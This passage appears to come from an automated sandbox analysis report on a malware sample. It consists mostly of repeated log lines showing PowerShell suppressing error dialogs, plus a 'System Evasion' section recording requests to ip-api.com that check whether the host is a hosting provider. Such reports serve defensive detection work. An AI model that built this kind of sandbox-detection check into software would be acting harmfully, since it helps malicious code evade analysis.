                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
